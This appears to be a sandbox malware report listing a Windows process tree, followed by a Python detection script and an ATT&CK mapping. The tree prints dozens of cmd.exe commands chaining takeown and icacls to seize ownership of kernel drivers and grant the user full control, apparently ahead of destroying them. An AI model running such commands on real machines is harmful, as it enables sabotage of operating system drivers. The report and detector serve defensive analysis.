C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\USBSTOR.SYS && icacls C:\Windows\System32\drivers\USBSTOR.SYS /grant "%username%:F" && exit2⤵PID:5980
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\USBSTOR.SYS3⤵
- Modifies file permissions
PID:7400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbuhci.sys && icacls C:\Windows\System32\drivers\usbuhci.sys /grant "%username%:F" && exit2⤵PID:6016
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\usbuhci.sys3⤵PID:7432
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vdrvroot.sys && icacls C:\Windows\System32\drivers\vdrvroot.sys /grant "%username%:F" && exit2⤵PID:6028
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\vdrvroot.sys3⤵PID:7372
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vga.sys && icacls C:\Windows\System32\drivers\vga.sys /grant "%username%:F" && exit2⤵PID:6092
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\vga.sys3⤵PID:7504
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vgapnp.sys && icacls C:\Windows\System32\drivers\vgapnp.sys /grant "%username%:F" && exit2⤵PID:6120
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\vgapnp.sys3⤵
- Modifies file permissions
PID:7520
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vhdmp.sys && icacls C:\Windows\System32\drivers\vhdmp.sys /grant "%username%:F" && exit2⤵PID:6132
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\vhdmp.sys3⤵PID:7456
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\viaide.sys && icacls C:\Windows\System32\drivers\viaide.sys /grant "%username%:F" && exit2⤵PID:3148
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\viaide.sys3⤵PID:7472
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\videoprt.sys && icacls C:\Windows\System32\drivers\videoprt.sys /grant "%username%:F" && exit2⤵PID:3208
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\videoprt.sys3⤵
- Possible privilege escalation attempt
PID:7528
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vmbus.sys && icacls C:\Windows\System32\drivers\vmbus.sys /grant "%username%:F" && exit2⤵PID:3272
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\vmbus.sys3⤵
- Modifies file permissions
PID:7512
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\VMBusHID.sys && icacls C:\Windows\System32\drivers\VMBusHID.sys /grant "%username%:F" && exit2⤵PID:4888
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\VMBusHID.sys3⤵
- Possible privilege escalation attempt
PID:7588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vms3cap.sys && icacls C:\Windows\System32\drivers\vms3cap.sys /grant "%username%:F" && exit2⤵PID:3888
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\vms3cap.sys3⤵PID:7612
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vmstorfl.sys && icacls C:\Windows\System32\drivers\vmstorfl.sys /grant "%username%:F" && exit2⤵PID:1960
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\vmstorfl.sys3⤵
- Modifies file permissions
PID:7604
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\volmgr.sys && icacls C:\Windows\System32\drivers\volmgr.sys /grant "%username%:F" && exit2⤵PID:4872
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\volmgr.sys3⤵PID:7648
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\volmgrx.sys && icacls C:\Windows\System32\drivers\volmgrx.sys /grant "%username%:F" && exit2⤵PID:5304
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\volsnap.sys && icacls C:\Windows\System32\drivers\volsnap.sys /grant "%username%:F" && exit2⤵PID:3468
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vsmraid.sys && icacls C:\Windows\System32\drivers\vsmraid.sys /grant "%username%:F" && exit2⤵PID:1632
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\vsmraid.sys3⤵PID:7672
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vwifibus.sys && icacls C:\Windows\System32\drivers\vwifibus.sys /grant "%username%:F" && exit2⤵PID:2544
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\vwifibus.sys3⤵PID:7700
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vwififlt.sys && icacls C:\Windows\System32\drivers\vwififlt.sys /grant "%username%:F" && exit2⤵PID:3652
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vwifimp.sys && icacls C:\Windows\System32\drivers\vwifimp.sys /grant "%username%:F" && exit2⤵PID:5668
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\wacompen.sys && icacls C:\Windows\System32\drivers\wacompen.sys /grant "%username%:F" && exit2⤵PID:5804
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\wanarp.sys && icacls C:\Windows\System32\drivers\wanarp.sys /grant "%username%:F" && exit2⤵PID:6052
-
-
C:\Windows\System32\cmd.exe [level 2, PID 3420]
  "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\watchdog.sys && icacls C:\Windows\System32\drivers\watchdog.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe [level 2, PID 3184]
  "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\wd.sys && icacls C:\Windows\System32\drivers\wd.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe [level 2, PID 5176]
  "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Wdf01000.sys && icacls C:\Windows\System32\drivers\Wdf01000.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe [level 2, PID 3784]
  "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\WdfLdr.sys && icacls C:\Windows\System32\drivers\WdfLdr.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe [level 2, PID 6156]
  "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\wfplwf.sys && icacls C:\Windows\System32\drivers\wfplwf.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe [level 2, PID 6200]
  "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\wimmount.sys && icacls C:\Windows\System32\drivers\wimmount.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe [level 2, PID 6260]
  "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\winhv.sys && icacls C:\Windows\System32\drivers\winhv.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe [level 2, PID 6332]
  "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\wmiacpi.sys && icacls C:\Windows\System32\drivers\wmiacpi.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe [level 2, PID 6360]
  "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\wmilib.sys && icacls C:\Windows\System32\drivers\wmilib.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe [level 2, PID 6416]
  "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ws2ifsl.sys && icacls C:\Windows\System32\drivers\ws2ifsl.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe [level 2, PID 6468]
  "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\WUDFPf.sys && icacls C:\Windows\System32\drivers\WUDFPf.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe [level 2, PID 6480]
  "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\WUDFRd.sys && icacls C:\Windows\System32\drivers\WUDFRd.sys /grant "%username%:F" && exit
The conhost.exe entries below are the console hosts that csrss.exe starts for each console process spawned by the sample (one per cmd.exe instance above). On Windows 7 conhost.exe is launched through its NT path (\??\...) with a quoted string of signed integers as its only argument, so these entries are expected side effects rather than indicators in their own right; they sit at level 1 because their parent, csrss.exe, is not part of the sample's tree. PIDs 1740 and 1212 each appear twice, i.e. the PID was reused after the earlier console host exited. The single WMIADAP.EXE entry is the WMI performance-counter adapter refresh, routinely seen in sandbox runs and unrelated to the sample.
C:\Windows\system32\conhost.exe [level 1, PID 1740]
  \??\C:\Windows\system32\conhost.exe "-12504852535114282982559108991727715739501317440525675229-512061581-686635493"
C:\Windows\system32\conhost.exe [level 1, PID 568]
  \??\C:\Windows\system32\conhost.exe "-413874045-11205033174233756913974439002145862461-11313556811969025703-107782407"
C:\Windows\system32\conhost.exe [level 1, PID 1212]
  \??\C:\Windows\system32\conhost.exe "-1425611529-597050752-11863401812010040003-1999493921706548879146895945-1757242746"
C:\Windows\system32\conhost.exe [level 1, PID 268]
  \??\C:\Windows\system32\conhost.exe "-19673350042070290055-200727377521414371661653536340266071442467376-332249039"
C:\Windows\system32\conhost.exe [level 1, PID 2516]
  \??\C:\Windows\system32\conhost.exe "1158633364-1001587524-1195740942-618008001-8826698-1799261124-4274674671808113922"
C:\Windows\system32\conhost.exe [level 1, PID 2844]
  \??\C:\Windows\system32\conhost.exe "502982392121620223252184176-1384763121-161227806318784303421358830507-676740508"
C:\Windows\system32\conhost.exe [level 1, PID 2800]
  \??\C:\Windows\system32\conhost.exe "741230558-4695387695698526841805383027-11432787719551824611267162502-617936257"
C:\Windows\system32\conhost.exe [level 1, PID 2912]
  \??\C:\Windows\system32\conhost.exe "1497279770287531814189140657-83114107925451080-589023849-1402247151593692994"
C:\Windows\system32\conhost.exe [level 1, PID 616]
  \??\C:\Windows\system32\conhost.exe "3764463191179504980489106542-15783623301604960059-15772749571377431585-286576122"
C:\Windows\system32\conhost.exe [level 1, PID 1908]
  \??\C:\Windows\system32\conhost.exe "-753909943-2030158418-632010319-182534274980402869-276564376604421453-1968931444"
C:\Windows\system32\conhost.exe [level 1, PID 788]
  \??\C:\Windows\system32\conhost.exe "212542570716153239121576351316-1689600936-1131102566-35518679920433601191261898536"
C:\Windows\system32\conhost.exe [level 1, PID 1416]
  \??\C:\Windows\system32\conhost.exe "79418552390177984319626546632057244406-3545828742045503014-689524953733571435"
C:\Windows\system32\wbem\WMIADAP.EXE [level 1, PID 2644]
  wmiadap.exe /F /T /R
C:\Windows\system32\conhost.exe [level 1, PID 2596]
  \??\C:\Windows\system32\conhost.exe "-1411250918420427785-2092731971-161889829219483501061039808132-1916075078232503373"
C:\Windows\system32\conhost.exe [level 1, PID 2804]
  \??\C:\Windows\system32\conhost.exe "835822030-320291065-1646255318-3057798571234873878192798962-1341315016-1705370124"
C:\Windows\system32\conhost.exe [level 1, PID 1900]
  \??\C:\Windows\system32\conhost.exe "-1308095610-66802665904987281-123745565615742361131655378041285866235-1762998124"
C:\Windows\system32\conhost.exe [level 1, PID 836]
  \??\C:\Windows\system32\conhost.exe "-268903752-667040418-1944216651665134954-317248482108309317-851836137131414631"
C:\Windows\system32\conhost.exe [level 1, PID 928]
  \??\C:\Windows\system32\conhost.exe "133597895814909924511077556018-98061709-10335264821762255085-1616247858-1566893529"
C:\Windows\system32\conhost.exe [level 1, PID 2980]
  \??\C:\Windows\system32\conhost.exe "-433357134-1261213469626251291-1861879467-1885387813-1482841218-5902396321678530628"
C:\Windows\system32\conhost.exe [level 1, PID 2676]
  \??\C:\Windows\system32\conhost.exe "4959298908914054131892468559-17550163381868486381276974408746798901-74758636"
C:\Windows\system32\conhost.exe [level 1, PID 384]
  \??\C:\Windows\system32\conhost.exe "-11202808461216890756-825912912135417222-1003382785-4140381699703901691745804823"
C:\Windows\system32\conhost.exe [level 1, PID 1740]
  \??\C:\Windows\system32\conhost.exe "2917411672125394699-1713865514-8893865214036431191638875271-1390440106-1363375413"
C:\Windows\system32\conhost.exe [level 1, PID 328]
  \??\C:\Windows\system32\conhost.exe "463133115-186052617-189845054325910245577094098-13969326444556362211024668850"
C:\Windows\system32\conhost.exe [level 1, PID 2648]
  \??\C:\Windows\system32\conhost.exe "-265104017-5039031811026844655-194496057-57481615016376092166432223952124787613"
C:\Windows\system32\conhost.exe [level 1, PID 1580]
  \??\C:\Windows\system32\conhost.exe "1325169454365553543642595993-18046958971420984222-3748840911315221346315015279"
C:\Windows\system32\conhost.exe [level 1, PID 764]
  \??\C:\Windows\system32\conhost.exe "-6751285271805827354-12128499592755018091636317481992532691-9582286951625928070"
C:\Windows\system32\conhost.exe [level 1, PID 2860]
  \??\C:\Windows\system32\conhost.exe "6750239431334577479-30133459-975352335152697075120898178291507630248-1339782663"
C:\Windows\system32\conhost.exe [level 1, PID 1852]
  \??\C:\Windows\system32\conhost.exe "-111872130-1096875014-18976979211235533389-1473568282-14032312061165901692-519261380"
C:\Windows\system32\conhost.exe [level 1, PID 2832]
  \??\C:\Windows\system32\conhost.exe "-16310207371698784813-556748656-177274652-863414095-5697571051355636133267555857"
C:\Windows\system32\conhost.exe [level 1, PID 2152]
  \??\C:\Windows\system32\conhost.exe "-228930568415875382-469097775-13204578937337308555432858-1739298398-1312686919"
C:\Windows\system32\conhost.exe [level 1, PID 1364]
  \??\C:\Windows\system32\conhost.exe "139251431139561971149827646851663780-104767654-2010398436-1451188499-2110241970"
C:\Windows\system32\conhost.exe [level 1, PID 2136]
  \??\C:\Windows\system32\conhost.exe "-1964671506-826709585113832228-558012985-10494957401779564839-4082070031020471600"
C:\Windows\system32\conhost.exe [level 1, PID 2712]
  \??\C:\Windows\system32\conhost.exe "-1950996074304024936-2030084824932911153547815766-631382790-842530597-607673427"
C:\Windows\system32\conhost.exe [level 1, PID 1232]
  \??\C:\Windows\system32\conhost.exe "-663484289-1058409012-12213830791409565093-1489062299-1227152810110934891700907412"
C:\Windows\system32\conhost.exe [level 1, PID 996]
  \??\C:\Windows\system32\conhost.exe "-864149638-113124850235858471914798110881318383346-751628942569560735-1430590452"
C:\Windows\system32\conhost.exe [level 1, PID 2640]
  \??\C:\Windows\system32\conhost.exe "876563149100709584117115900213396040001298529895-104567988318000127-647009493"
C:\Windows\system32\conhost.exe [level 1, PID 2616]
  \??\C:\Windows\system32\conhost.exe "196883128815022483901459963263352203392-152037514-9468151711494356322-161658484"
C:\Windows\system32\conhost.exe [level 1, PID 1188]
  \??\C:\Windows\system32\conhost.exe "-1345671342-1720084539-9145624651902073970-715355928-1941201672-2051206344-1828932604"
C:\Windows\system32\conhost.exe [level 1, PID 796]
  \??\C:\Windows\system32\conhost.exe "3952645391590667283269263678-192306828-10939792506792929501410619203-1112749758"
C:\Windows\system32\conhost.exe [level 1, PID 1532]
  \??\C:\Windows\system32\conhost.exe "460631247-18683061201422154931-17929318731309440712-1823704939-7156550241234382687"
C:\Windows\system32\conhost.exe [level 1, PID 1744]
  \??\C:\Windows\system32\conhost.exe "-931001163122769391414075619019709455804301068171137016886430177483-1315167266"
C:\Windows\system32\conhost.exe [level 1, PID 2972]
  \??\C:\Windows\system32\conhost.exe "12081410191989440601782500996-18769815121253071025-163680044220296052961218128169"
C:\Windows\system32\conhost.exe [level 1, PID 2692]
  \??\C:\Windows\system32\conhost.exe "-1928811205-631159405760367649133291684-1781579079-2015408651-8776972362059567487"
C:\Windows\system32\conhost.exe [level 1, PID 2592]
  \??\C:\Windows\system32\conhost.exe "-2090989477-324953875-32789296-2136835204613416340-17531814591782874163666966846"
C:\Windows\system32\conhost.exe [level 1, PID 1856]
  \??\C:\Windows\system32\conhost.exe "-1882110797892897026-7842282991728785196-11842535811123142171354302264-1560893075"
C:\Windows\system32\conhost.exe [level 1, PID 2436]
  \??\C:\Windows\system32\conhost.exe "929768323838378531791558569-408514172015811718-79944318-730215324652082793"
C:\Windows\system32\conhost.exe [level 1, PID 1212]
  \??\C:\Windows\system32\conhost.exe "549811235-24437450615291349231185227768130011207-523277825-339339408-243035314"
C:\Windows\system32\conhost.exe [level 1, PID 1704]
  \??\C:\Windows\system32\conhost.exe "32024048174446641-1492387179117354351-1006274442-1582010810-1839596502-367878756"
C:\Windows\system32\conhost.exe [level 1, PID 1524]
  \??\C:\Windows\system32\conhost.exe "446271551-45844174921305734981875553411-13614847211552147854-666033463263347157"
C:\Windows\system32\conhost.exe [level 1, PID 1516]
  \??\C:\Windows\system32\conhost.exe "-9565434659983128959594543471540784178-1198722942-1140547291-2064106278-55119259"
C:\Windows\system32\conhost.exe [level 1, PID 2496]
  \??\C:\Windows\system32\conhost.exe "-2048806332-800174446-1575114282958732208-20696075441750419494-19345823911740881043"
C:\Windows\system32\conhost.exe [level 1, PID 3108]
  \??\C:\Windows\system32\conhost.exe "-1625943530-311444049-1433525773421101249213067885010125644474601661452129188628"
C:\Windows\system32\conhost.exe [level 1, PID 3200]
  \??\C:\Windows\system32\conhost.exe "-1593228500-2025865303811922551939535445-1127701181-76513044719029625761052542302"
C:\Windows\system32\conhost.exe [level 1, PID 2672]
  \??\C:\Windows\system32\conhost.exe "-1875845465-952551588789770902-2033485266-1825068225-1567491970550438758-848280568"
C:\Windows\system32\conhost.exe [level 1, PID 272]
  \??\C:\Windows\system32\conhost.exe "1660366461-963053543-627624440-16537849389863487518181899743695080251908081839"
C:\Windows\system32\conhost.exe [level 1, PID 820]
  \??\C:\Windows\system32\conhost.exe "-1043088804-663743059-157663413-1136165633-328240149285210460-369836124-1572935184"
C:\Windows\system32\conhost.exe [level 1, PID 3948]
  \??\C:\Windows\system32\conhost.exe "-778968596-1830146963-866985756930277884-19877981211664406877814436235-1760638639"
C:\Windows\system32\conhost.exe [level 1, PID 4016]
  \??\C:\Windows\system32\conhost.exe "2012864824-1364131708-18217543845966753911635546765-1262253055-19537633531737955333"
C:\Windows\system32\conhost.exe [level 1, PID 2576]
  \??\C:\Windows\system32\conhost.exe "5860678397351190402112503120176960837102515564580893799313197287041385958213"
C:\Windows\system32\conhost.exe [level 1, PID 1608]
  \??\C:\Windows\system32\conhost.exe "-1107080383-11027059041262705238-13680740411075164671481519930-128682167-361737975"
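The detection-worthy behaviour in this process tree is the takeown/icacls chain: each cmd.exe child takes ownership of one kernel driver under System32\drivers and grants the current user full control, which is the precondition for deleting or overwriting those drivers later. Two practical details follow from the command lines themselves: takeown /f without /a gives ownership to the invoking user, so "%username%:F" is that same user, and because cmd /k keeps the shell open, "a && b && exit" only reaches exit when both takeown and icacls succeed, so a failing step leaves a lingering cmd.exe behind. The Python below is an added example written for this page, not code from the sandbox or the sample. It picks the chain out of process-creation records (the layout mirrors Sysmon event 1 / 4688 fields: pid, ppid, image, command line), aggregates the drivers touched per parent process so the mass pattern stands out, and suppresses the Windows 7 conhost.exe entries that csrss.exe starts for every console process. The records are constructed: command lines are copied from the tree above, but the parent PIDs are assumptions (1724 is the sample's PID from the report's memory IoCs; 400, 900 and 2000 are invented stand-ins), and the lone takeown on a user file is a constructed negative case.

```python
"""Added example, not part of the sandbox report: pick the takeown/icacls
driver-ownership chain out of process-creation records and suppress the
Windows 7 conhost.exe noise around it."""
import re
from collections import defaultdict

# Constructed process-creation records: (pid, ppid, image, command line).
# Command lines are copied from the report's process tree. Parent PIDs are
# assumptions: 1724 is the sample's PID from the report's memory IoCs;
# 400/900/2000 are invented stand-ins for csrss.exe, svchost.exe and an
# unrelated admin shell.
SAMPLE_LOG = [
    (3420, 1724, r"C:\Windows\System32\cmd.exe",
     r'"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\watchdog.sys && icacls C:\Windows\System32\drivers\watchdog.sys /grant "%username%:F" && exit'),
    (3184, 1724, r"C:\Windows\System32\cmd.exe",
     r'"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\wd.sys && icacls C:\Windows\System32\drivers\wd.sys /grant "%username%:F" && exit'),
    (5176, 1724, r"C:\Windows\System32\cmd.exe",
     r'"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Wdf01000.sys && icacls C:\Windows\System32\drivers\Wdf01000.sys /grant "%username%:F" && exit'),
    (3784, 1724, r"C:\Windows\System32\cmd.exe",
     r'"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\WdfLdr.sys && icacls C:\Windows\System32\drivers\WdfLdr.sys /grant "%username%:F" && exit'),
    # Constructed negative case: takeown on a user file, not a driver.
    (4100, 2000, r"C:\Windows\System32\cmd.exe",
     r'"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\notes.txt'),
    # Console hosts from the report; csrss.exe starts one per console process.
    (1740, 400, r"C:\Windows\system32\conhost.exe",
     r'\??\C:\Windows\system32\conhost.exe "-12504852535114282982559108991727715739501317440525675229-512061581-686635493"'),
    (568, 400, r"C:\Windows\system32\conhost.exe",
     r'\??\C:\Windows\system32\conhost.exe "-413874045-11205033174233756913974439002145862461-11313556811969025703-107782407"'),
    # WMI performance adapter refresh from the report, unrelated to the sample.
    (2644, 900, r"C:\Windows\system32\wbem\WMIADAP.EXE", r"wmiadap.exe /F /T /R"),
]

CHAIN_OPS = re.compile(r"\s*(?:&&|\|\||&|\|)\s*")  # cmd.exe chaining operators
TAKEOWN = re.compile(r'(?i)\btakeown(?:\.exe)?\b.*?/f\s+("[^"]+"|\S+)')
ICACLS_GRANT = re.compile(r'(?i)\bicacls(?:\.exe)?\s+("[^"]+"|\S+).*?/grant(?::r)?\s+("[^"]+"|\S+)')
DRIVER_PATH = re.compile(r'(?i)[a-z]:\\windows\\system32\\drivers\\[^\\\s"]+\.sys')
# Windows 7 form: NT path plus a quoted string of signed integers as the only argument.
CONHOST_WIN7 = re.compile(r'(?i)^\\\?\?\\[a-z]:\\windows\\system32\\conhost\.exe "[-\d]+"$')


def _norm(path):
    return path.strip('"').lower()


def analyze(records, mass_threshold=3):
    """Return driver ACL-tampering hits, parents that touched at least
    mass_threshold distinct drivers, and the PIDs of conhost instances that
    match the benign Windows 7 launch form."""
    hits, per_parent, conhost = [], defaultdict(set), []
    for pid, ppid, image, cmdline in records:
        if image.lower().endswith("\\conhost.exe") and CONHOST_WIN7.match(cmdline):
            conhost.append(pid)
            continue
        owned, granted = set(), {}
        # Evaluate each chained command on its own so options are not mixed up.
        for seg in CHAIN_OPS.split(cmdline):
            m = TAKEOWN.search(seg)
            if m:
                owned.add(_norm(m.group(1)))
            m = ICACLS_GRANT.search(seg)
            if m:
                granted[_norm(m.group(1))] = m.group(2).strip('"')
        for path in owned | set(granted):
            if not DRIVER_PATH.fullmatch(path):
                continue  # ownership changes outside drivers\ are out of scope here
            hits.append({"pid": pid, "ppid": ppid, "driver": path.rsplit("\\", 1)[1],
                         "takeown": path in owned, "grant": granted.get(path)})
            per_parent[ppid].add(path)
    mass = sorted(p for p, drivers in per_parent.items() if len(drivers) >= mass_threshold)
    return {"hits": hits, "mass_takeover_parents": mass, "benign_conhost": conhost}


if __name__ == "__main__":
    result = analyze(SAMPLE_LOG)
    for h in result["hits"]:
        print(f"pid {h['pid']} (parent {h['ppid']}): {h['driver']} takeown={h['takeown']} grant={h['grant']}")
    print("parents taking over >=3 drivers:", result["mass_takeover_parents"])
    print("benign conhost instances suppressed:", len(result["benign_conhost"]))
```

The per-parent aggregation is what turns twelve individually plausible admin commands into one alert: a single takeown on a driver happens during legitimate troubleshooting, a dozen in a row from one parent does not. The conhost filter is deliberately narrow (NT path, digits and minus signs only) so that a conhost.exe started with any other argument still surfaces for review.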
Network
MITRE ATT&CK Enterprise v15 (count of matching signatures after each technique)
Persistence
  Boot or Logon Autostart Execution (T1547): 2
    Winlogon Helper DLL (T1547.004): 2
  Event Triggered Execution (T1546): 1
    Change Default File Association (T1546.001): 1
Privilege Escalation
  Abuse Elevation Control Mechanism (T1548): 1
    Bypass User Account Control (T1548.002): 1
  Boot or Logon Autostart Execution (T1547): 2
    Winlogon Helper DLL (T1547.004): 2
  Event Triggered Execution (T1546): 1
    Change Default File Association (T1546.001): 1
Downloads
-
C:\Users\Admin\Desktop\▀5½õ♠≈²—߬▌3∞ř²č☼ž☼♦¥Ÿ╚◄╠µÿ®®☼↑æ▼▲1█♪¢₧╬ř╔○◘☻3½╥╚ř94ß霚♣5╔ä¥řčåé¶é«õ¶○ó╬½▐ÿ╔♣≈▌čσ╔1■≈♫²¥♥«7ä6ø™▬1π♂
Filesize: 666B
MD5: 9e1e5883c74742a497cf5c272ccd2321
SHA1: 2cf33e34d08b8e17743a60352baffef4b6f02dee
SHA256: ca687b6a7c3d29b566f3e1988b9f877b51d9a83ee25ffe0755a8dcd3eb5f434a
SHA512: f2284f0c624cc07a65c16f87865bb98aaa176b1d8b45cd4fbcc1143c9c2297fe6b1d4db55ef054be2bc151c8cc25ff4da7c997b7d38dae3dccd2ffe1c3c01a6b